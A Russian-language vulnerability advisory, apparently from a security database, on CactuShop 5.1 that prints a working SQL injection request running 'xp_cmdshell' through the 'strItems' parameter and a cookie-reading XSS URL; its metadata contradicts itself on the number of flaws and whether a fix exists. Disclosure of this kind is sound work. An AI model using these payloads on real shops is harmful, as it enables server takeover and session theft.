Несколько уязвимостей в CactuShop

Дата публикации:
02.04.2004
Всего просмотров:
1042
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CactuShop 5.x
Уязвимые версии: CactuShop 5.1

Описание: Несколько уязвимостей обнаружено в CactuShop. Удаленный пользователь может внедрить SQL команды и выполнить произвольные команды операционноц системы. Удаленный пользователь может выполнить XSS нападение.

Сценарии 'mailorder.asp' и 'payonline.asp' не проверяют данные, представленные пользователем в параметре 'strItems'. Пример:

strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&
CD_AffiliateID=&CD _CardholderCountry=200&CD_ShippingCountry=200&
CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&
numCurrencyID=1&numItemCount=2&strItems=214;+ exec+master..xp_cmdshell+'dir+c:'--z165z&
strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
Также сообщается что сценарий 'largeimage.asp' не фильтрует HTMl код, представленный пользователем:
http://[target]/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script>

URL производителя:http://www.cactushop.com/main/default.asp

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: S-Quadra Advisory #2004-03-31

или введите имя

CAPTCHA